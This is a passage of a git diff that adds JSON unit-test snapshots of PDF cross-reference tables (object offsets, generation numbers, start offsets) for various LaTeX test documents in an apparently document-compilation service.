b/services/clsi/test/unit/js/snapshots/pdfjs/asymptote/XrefTable.json @@ -0,0 +1,359 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 123103, + "gen": 0, + "uncompressed": true + }, + { + "offset": 123422, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1084, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1244, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4001, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4155, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4297, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4933, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5309, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5498, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30250, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31471, + "gen": 0, + "uncompressed": true + }, + { + "offset": 38404, + "gen": 0, + "uncompressed": true + }, + { + "offset": 39046, + "gen": 0, + "uncompressed": true + }, + { + "offset": 40166, + "gen": 0, + "uncompressed": true + }, + { + "offset": 40906, + "gen": 0, + "uncompressed": true + }, + { + "offset": 65560, + "gen": 0, + "uncompressed": true + }, + { + "offset": 74702, + "gen": 0, + "uncompressed": true + }, + { + "offset": 81705, + "gen": 0, + "uncompressed": true + }, + { + "offset": 97182, + "gen": 0, + "uncompressed": true + }, + { + "offset": 104117, + "gen": 0, + "uncompressed": true + }, + { + "offset": 111195, + "gen": 0, + "uncompressed": true + }, + { + "offset": 118571, + "gen": 0, + "uncompressed": true + }, + { + "offset": 6, + "gen": 0 + }, + { + "offset": 6, + "gen": 1 + }, + { + "offset": 6, + "gen": 2 + }, + { + "offset": 6, + "gen": 3 + }, + { + "offset": 6, + "gen": 4 + }, + { + "offset": 6, + "gen": 5 + }, + { + "offset": 6, + "gen": 6 + }, + { + "offset": 6, + "gen": 7 + }, + { + "offset": 6, + "gen": 8 + }, + { + "offset": 6, + "gen": 9 + }, + { + "offset": 6, + "gen": 10 + }, + { + "offset": 6, + "gen": 11 + }, + { + "offset": 6, + "gen": 12 + }, + { + "offset": 6, + "gen": 13 + }, + { + "offset": 6, + "gen": 14 + }, + { + "offset": 6, + "gen": 15 + }, + { + "offset": 6, + "gen": 16 + }, + { + "offset": 6, + "gen": 17 + }, + { + "offset": 6, + "gen": 18 + }, + { + "offset": 6, + "gen": 19 + }, + { + "offset": 6, + "gen": 20 + }, + { + "offset": 6, + "gen": 21 + }, + { + "offset": 6, + "gen": 22 + }, + { + "offset": 6, + "gen": 23 + }, + { + "offset": 6, + "gen": 24 + }, + { + "offset": 6, + "gen": 25 + }, + { + "offset": 6, + "gen": 26 + }, + { + "offset": 6, + "gen": 27 + }, + { + "offset": 6, + "gen": 28 + }, + { + "offset": 6, + "gen": 29 + }, + { + "offset": 6, + "gen": 30 + }, + { + "offset": 6, + "gen": 31 + }, + { + "offset": 6, + "gen": 32 + }, + { + "offset": 6, + "gen": 33 + }, + { + "offset": 6, + "gen": 34 + }, + { + "offset": 6, + "gen": 35 + }, + { + "offset": 6, + "gen": 36 + }, + { + "offset": 6, + "gen": 37 + }, + { + "offset": 6, + "gen": 38 + }, + { + "offset": 6, + "gen": 39 + }, + { + "offset": 6, + "gen": 40 + }, + { + "offset": 6, + "gen": 41 + }, + { + "offset": 6, + "gen": 42 + }, + { + "offset": 6, + "gen": 43 + }, + { + "offset": 6, + "gen": 44 + }, + { + "offset": 6, + "gen": 45 + }, + { + "offset": 6, + "gen": 46 + }, + { + "offset": 6, + "gen": 47 + }, + { + "offset": 6, + "gen": 48 + }, + { + "offset": 6, + "gen": 49 + }, + { + "offset": 6, + "gen": 50 + }, + { + "offset": 6, + "gen": 51 + }, + { + "offset": 6, + "gen": 52 + }, + { + "offset": 6, + "gen": 53 + }, + { + "offset": 6, + "gen": 54 + }, + { + "offset": 6, + "gen": 55 + } + ], + "startXRefTable": 123422 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/biber_bibliography/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/biber_bibliography/XrefTable.json new file mode 100644 index 0000000..93cf1c1 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/biber_bibliography/XrefTable.json @@ -0,0 +1,148 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 59313, + "gen": 0, + "uncompressed": true + }, + { + "offset": 59561, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 734, + "gen": 0, + "uncompressed": true + }, + { + "offset": 784, + "gen": 0, + "uncompressed": true + }, + { + "offset": 913, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1028, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1528, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9787, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18282, + "gen": 0, + "uncompressed": true + }, + { + "offset": 33607, + "gen": 0, + "uncompressed": true + }, + { + "offset": 45579, + "gen": 0, + "uncompressed": true + }, + { + "offset": 58005, + "gen": 0, + "uncompressed": true + }, + { + "offset": 14, + "gen": 0 + }, + { + "offset": 14, + "gen": 1 + }, + { + "offset": 14, + "gen": 2 + }, + { + "offset": 14, + "gen": 3 + }, + { + "offset": 14, + "gen": 4 + }, + { + "offset": 14, + "gen": 5 + }, + { + "offset": 14, + "gen": 6 + }, + { + "offset": 14, + "gen": 7 + }, + { + "offset": 14, + "gen": 8 + }, + { + "offset": 14, + "gen": 9 + }, + { + "offset": 14, + "gen": 10 + }, + { + "offset": 14, + "gen": 11 + }, + { + "offset": 14, + "gen": 12 + }, + { + "offset": 14, + "gen": 13 + }, + { + "offset": 14, + "gen": 14 + }, + { + "offset": 14, + "gen": 15 + }, + { + "offset": 14, + "gen": 16 + } + ], + "startXRefTable": 59561 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/draft_legacy/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/draft_legacy/XrefTable.json new file mode 100644 index 0000000..19cd40c --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/draft_legacy/XrefTable.json @@ -0,0 +1,182 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 67338, + "gen": 0, + "uncompressed": true + }, + { + "offset": 67606, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 790, + "gen": 0, + "uncompressed": true + }, + { + "offset": 840, + "gen": 0, + "uncompressed": true + }, + { + "offset": 975, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1083, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1578, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9881, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17868, + "gen": 0, + "uncompressed": true + }, + { + "offset": 29906, + "gen": 0, + "uncompressed": true + }, + { + "offset": 38400, + "gen": 0, + "uncompressed": true + }, + { + "offset": 46656, + "gen": 0, + "uncompressed": true + }, + { + "offset": 56198, + "gen": 0, + "uncompressed": true + }, + { + "offset": 65682, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16, + "gen": 0 + }, + { + "offset": 16, + "gen": 1 + }, + { + "offset": 16, + "gen": 2 + }, + { + "offset": 16, + "gen": 3 + }, + { + "offset": 16, + "gen": 4 + }, + { + "offset": 16, + "gen": 5 + }, + { + "offset": 16, + "gen": 6 + }, + { + "offset": 16, + "gen": 7 + }, + { + "offset": 16, + "gen": 8 + }, + { + "offset": 16, + "gen": 9 + }, + { + "offset": 16, + "gen": 10 + }, + { + "offset": 16, + "gen": 11 + }, + { + "offset": 16, + "gen": 12 + }, + { + "offset": 16, + "gen": 13 + }, + { + "offset": 16, + "gen": 14 + }, + { + "offset": 16, + "gen": 15 + }, + { + "offset": 16, + "gen": 16 + }, + { + "offset": 16, + "gen": 17 + }, + { + "offset": 16, + "gen": 18 + }, + { + "offset": 16, + "gen": 19 + }, + { + "offset": 16, + "gen": 20 + }, + { + "offset": 16, + "gen": 21 + }, + { + "offset": 16, + "gen": 22 + } + ], + "startXRefTable": 67606 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/draft_mode/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/draft_mode/XrefTable.json new file mode 100644 index 0000000..e3b965f --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/draft_mode/XrefTable.json @@ -0,0 +1,226 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 69708, + "gen": 0, + "uncompressed": true + }, + { + "offset": 70038, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 867, + "gen": 0, + "uncompressed": true + }, + { + "offset": 990, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1143, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1251, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1834, + "gen": 0, + "uncompressed": true + }, + { + "offset": 10137, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18124, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31939, + "gen": 0, + "uncompressed": true + }, + { + "offset": 40433, + "gen": 0, + "uncompressed": true + }, + { + "offset": 48689, + "gen": 0, + "uncompressed": true + }, + { + "offset": 58231, + "gen": 0, + "uncompressed": true + }, + { + "offset": 67715, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16, + "gen": 0 + }, + { + "offset": 16, + "gen": 1 + }, + { + "offset": 16, + "gen": 2 + }, + { + "offset": 16, + "gen": 3 + }, + { + "offset": 16, + "gen": 4 + }, + { + "offset": 16, + "gen": 5 + }, + { + "offset": 16, + "gen": 6 + }, + { + "offset": 16, + "gen": 7 + }, + { + "offset": 16, + "gen": 8 + }, + { + "offset": 16, + "gen": 9 + }, + { + "offset": 16, + "gen": 10 + }, + { + "offset": 16, + "gen": 11 + }, + { + "offset": 16, + "gen": 12 + }, + { + "offset": 16, + "gen": 13 + }, + { + "offset": 16, + "gen": 14 + }, + { + "offset": 16, + "gen": 15 + }, + { + "offset": 16, + "gen": 16 + }, + { + "offset": 16, + "gen": 17 + }, + { + "offset": 16, + "gen": 18 + }, + { + "offset": 16, + "gen": 19 + }, + { + "offset": 16, + "gen": 20 + }, + { + "offset": 16, + "gen": 21 + }, + { + "offset": 16, + "gen": 22 + }, + { + "offset": 16, + "gen": 23 + }, + { + "offset": 16, + "gen": 24 + }, + { + "offset": 16, + "gen": 25 + }, + { + "offset": 16, + "gen": 26 + }, + { + "offset": 16, + "gen": 27 + }, + { + "offset": 16, + "gen": 28 + }, + { + "offset": 16, + "gen": 29 + }, + { + "offset": 16, + "gen": 30 + }, + { + "offset": 16, + "gen": 31 + }, + { + "offset": 16, + "gen": 32 + }, + { + "offset": 16, + "gen": 33 + } + ], + "startXRefTable": 70038 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/epstopdf/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/epstopdf/XrefTable.json new file mode 100644 index 0000000..1687c13 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/epstopdf/XrefTable.json @@ -0,0 +1,145 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 31354, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31614, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 727, + "gen": 0, + "uncompressed": true + }, + { + "offset": 777, + "gen": 0, + "uncompressed": true + }, + { + "offset": 909, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1017, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19127, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19313, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19557, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19948, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20677, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23321, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30318, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0 + }, + { + "offset": 15, + "gen": 1 + }, + { + "offset": 15, + "gen": 2 + }, + { + "offset": 15, + "gen": 3 + }, + { + "offset": 15, + "gen": 4 + }, + { + "offset": 15, + "gen": 5 + }, + { + "offset": 15, + "gen": 6 + }, + { + "offset": 15, + "gen": 7 + }, + { + "offset": 15, + "gen": 8 + }, + { + "offset": 15, + "gen": 9 + }, + { + "offset": 15, + "gen": 10 + }, + { + "offset": 15, + "gen": 11 + }, + { + "offset": 15, + "gen": 12 + }, + { + "offset": 15, + "gen": 13 + }, + { + "offset": 15, + "gen": 14 + } + ], + "startXRefTable": 31614 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/feynmf/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/feynmf/XrefTable.json new file mode 100644 index 0000000..569fc46 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/feynmf/XrefTable.json @@ -0,0 +1,135 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 27064, + "gen": 0, + "uncompressed": true + }, + { + "offset": 27312, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 713, + "gen": 0, + "uncompressed": true + }, + { + "offset": 763, + "gen": 0, + "uncompressed": true + }, + { + "offset": 892, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1007, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1235, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4832, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12199, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19196, + "gen": 0, + "uncompressed": true + }, + { + "offset": 26341, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13, + "gen": 0 + }, + { + "offset": 13, + "gen": 1 + }, + { + "offset": 13, + "gen": 2 + }, + { + "offset": 13, + "gen": 3 + }, + { + "offset": 13, + "gen": 4 + }, + { + "offset": 13, + "gen": 5 + }, + { + "offset": 13, + "gen": 6 + }, + { + "offset": 13, + "gen": 7 + }, + { + "offset": 13, + "gen": 8 + }, + { + "offset": 13, + "gen": 9 + }, + { + "offset": 13, + "gen": 10 + }, + { + "offset": 13, + "gen": 11 + }, + { + "offset": 13, + "gen": 12 + }, + { + "offset": 13, + "gen": 13 + }, + { + "offset": 13, + "gen": 14 + } + ], + "startXRefTable": 27312 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/feynmp/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/feynmp/XrefTable.json new file mode 100644 index 0000000..0863cfa --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/feynmp/XrefTable.json @@ -0,0 +1,110 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 65535, + "free": true + }, + { + "offset": 4964, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5023, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5234, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 734, + "gen": 0, + "uncompressed": true + }, + { + "offset": 799, + "gen": 0, + "uncompressed": true + }, + { + "offset": 933, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1104, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1947, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1992, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2182, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2427, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2597, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2822, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2989, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3239, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3271, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3328, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3740, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4270, + "gen": 0, + "uncompressed": true + } + ], + "startXRefTable": 6682 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome/XrefTable.json new file mode 100644 index 0000000..efe6646 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome/XrefTable.json @@ -0,0 +1,113 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 31058, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31307, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 678, + "gen": 0, + "uncompressed": true + }, + { + "offset": 728, + "gen": 0, + "uncompressed": true + }, + { + "offset": 855, + "gen": 0, + "uncompressed": true + }, + { + "offset": 970, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1203, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18852, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30165, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11, + "gen": 0 + }, + { + "offset": 11, + "gen": 1 + }, + { + "offset": 11, + "gen": 2 + }, + { + "offset": 11, + "gen": 3 + }, + { + "offset": 11, + "gen": 4 + }, + { + "offset": 11, + "gen": 5 + }, + { + "offset": 11, + "gen": 6 + }, + { + "offset": 11, + "gen": 7 + }, + { + "offset": 11, + "gen": 8 + }, + { + "offset": 11, + "gen": 9 + }, + { + "offset": 11, + "gen": 10 + }, + { + "offset": 11, + "gen": 11 + } + ], + "startXRefTable": 31307 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome_xelatex/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome_xelatex/XrefTable.json new file mode 100644 index 0000000..3bc5421 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome_xelatex/XrefTable.json @@ -0,0 +1,129 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 6344, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 707, + "gen": 0, + "uncompressed": true + }, + { + "offset": 757, + "gen": 0, + "uncompressed": true + }, + { + "offset": 887, + "gen": 0, + "uncompressed": true + }, + { + "offset": 990, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1257, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1679, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2052, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4249, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4343, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5387, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5481, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5519, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0 + }, + { + "offset": 15, + "gen": 1 + }, + { + "offset": 15, + "gen": 2 + }, + { + "offset": 15, + "gen": 3 + }, + { + "offset": 15, + "gen": 4 + }, + { + "offset": 15, + "gen": 5 + }, + { + "offset": 15, + "gen": 6 + }, + { + "offset": 15, + "gen": 7 + }, + { + "offset": 15, + "gen": 8 + }, + { + "offset": 15, + "gen": 9 + }, + { + "offset": 15, + "gen": 10 + } + ], + "startXRefTable": 6344 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/glossaries/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/glossaries/XrefTable.json new file mode 100644 index 0000000..7c0a261 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/glossaries/XrefTable.json @@ -0,0 +1,114 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 34767, + "gen": 0, + "uncompressed": true + }, + { + "offset": 35015, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 678, + "gen": 0, + "uncompressed": true + }, + { + "offset": 728, + "gen": 0, + "uncompressed": true + }, + { + "offset": 856, + "gen": 0, + "uncompressed": true + }, + { + "offset": 971, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1394, + "gen": 0, + "uncompressed": true + }, + { + "offset": 10990, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19087, + "gen": 0, + "uncompressed": true + }, + { + "offset": 33769, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + }, + { + "offset": 12, + "gen": 9 + }, + { + "offset": 12, + "gen": 10 + } + ], + "startXRefTable": 35015 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/gnuplot/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/gnuplot/XrefTable.json new file mode 100644 index 0000000..3c7f692 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/gnuplot/XrefTable.json @@ -0,0 +1,109 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 23295, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23543, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 671, + "gen": 0, + "uncompressed": true + }, + { + "offset": 721, + "gen": 0, + "uncompressed": true + }, + { + "offset": 847, + "gen": 0, + "uncompressed": true + }, + { + "offset": 955, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7385, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15752, + "gen": 0, + "uncompressed": true + }, + { + "offset": 22721, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11, + "gen": 0 + }, + { + "offset": 11, + "gen": 1 + }, + { + "offset": 11, + "gen": 2 + }, + { + "offset": 11, + "gen": 3 + }, + { + "offset": 11, + "gen": 4 + }, + { + "offset": 11, + "gen": 5 + }, + { + "offset": 11, + "gen": 6 + }, + { + "offset": 11, + "gen": 7 + }, + { + "offset": 11, + "gen": 8 + }, + { + "offset": 11, + "gen": 9 + }, + { + "offset": 11, + "gen": 10 + } + ], + "startXRefTable": 23543 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/hebrew/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/hebrew/XrefTable.json new file mode 100644 index 0000000..ebbe74f --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/hebrew/XrefTable.json @@ -0,0 +1,101 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 24490, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24739, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 657, + "gen": 0, + "uncompressed": true + }, + { + "offset": 707, + "gen": 0, + "uncompressed": true + }, + { + "offset": 833, + "gen": 0, + "uncompressed": true + }, + { + "offset": 948, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1290, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13083, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23411, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11, + "gen": 0 + }, + { + "offset": 11, + "gen": 1 + }, + { + "offset": 11, + "gen": 2 + }, + { + "offset": 11, + "gen": 3 + }, + { + "offset": 11, + "gen": 4 + }, + { + "offset": 11, + "gen": 5 + }, + { + "offset": 11, + "gen": 6 + }, + { + "offset": 11, + "gen": 7 + }, + { + "offset": 11, + "gen": 8 + } + ], + "startXRefTable": 24739 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/knitr/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/knitr/XrefTable.json new file mode 100644 index 0000000..272bd59 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/knitr/XrefTable.json @@ -0,0 +1,148 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 43550, + "gen": 0, + "uncompressed": true + }, + { + "offset": 43799, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 734, + "gen": 0, + "uncompressed": true + }, + { + "offset": 784, + "gen": 0, + "uncompressed": true + }, + { + "offset": 913, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1021, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1546, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5794, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12915, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23660, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30657, + "gen": 0, + "uncompressed": true + }, + { + "offset": 42604, + "gen": 0, + "uncompressed": true + }, + { + "offset": 14, + "gen": 0 + }, + { + "offset": 14, + "gen": 1 + }, + { + "offset": 14, + "gen": 2 + }, + { + "offset": 14, + "gen": 3 + }, + { + "offset": 14, + "gen": 4 + }, + { + "offset": 14, + "gen": 5 + }, + { + "offset": 14, + "gen": 6 + }, + { + "offset": 14, + "gen": 7 + }, + { + "offset": 14, + "gen": 8 + }, + { + "offset": 14, + "gen": 9 + }, + { + "offset": 14, + "gen": 10 + }, + { + "offset": 14, + "gen": 11 + }, + { + "offset": 14, + "gen": 12 + }, + { + "offset": 14, + "gen": 13 + }, + { + "offset": 14, + "gen": 14 + }, + { + "offset": 14, + "gen": 15 + }, + { + "offset": 14, + "gen": 16 + } + ], + "startXRefTable": 43799 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/knitr_utf8/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/knitr_utf8/XrefTable.json new file mode 100644 index 0000000..de34dac --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/knitr_utf8/XrefTable.json @@ -0,0 +1,182 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 75299, + "gen": 0, + "uncompressed": true + }, + { + "offset": 75548, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 790, + "gen": 0, + "uncompressed": true + }, + { + "offset": 840, + "gen": 0, + "uncompressed": true + }, + { + "offset": 975, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1083, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2128, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13799, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23682, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31867, + "gen": 0, + "uncompressed": true + }, + { + "offset": 36116, + "gen": 0, + "uncompressed": true + }, + { + "offset": 50352, + "gen": 0, + "uncompressed": true + }, + { + "offset": 61569, + "gen": 0, + "uncompressed": true + }, + { + "offset": 73516, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16, + "gen": 0 + }, + { + "offset": 16, + "gen": 1 + }, + { + "offset": 16, + "gen": 2 + }, + { + "offset": 16, + "gen": 3 + }, + { + "offset": 16, + "gen": 4 + }, + { + "offset": 16, + "gen": 5 + }, + { + "offset": 16, + "gen": 6 + }, + { + "offset": 16, + "gen": 7 + }, + { + "offset": 16, + "gen": 8 + }, + { + "offset": 16, + "gen": 9 + }, + { + "offset": 16, + "gen": 10 + }, + { + "offset": 16, + "gen": 11 + }, + { + "offset": 16, + "gen": 12 + }, + { + "offset": 16, + "gen": 13 + }, + { + "offset": 16, + "gen": 14 + }, + { + "offset": 16, + "gen": 15 + }, + { + "offset": 16, + "gen": 16 + }, + { + "offset": 16, + "gen": 17 + }, + { + "offset": 16, + "gen": 18 + }, + { + "offset": 16, + "gen": 19 + }, + { + "offset": 16, + "gen": 20 + }, + { + "offset": 16, + "gen": 21 + }, + { + "offset": 16, + "gen": 22 + } + ], + "startXRefTable": 75548 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/latex_compiler/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/latex_compiler/XrefTable.json new file mode 100644 index 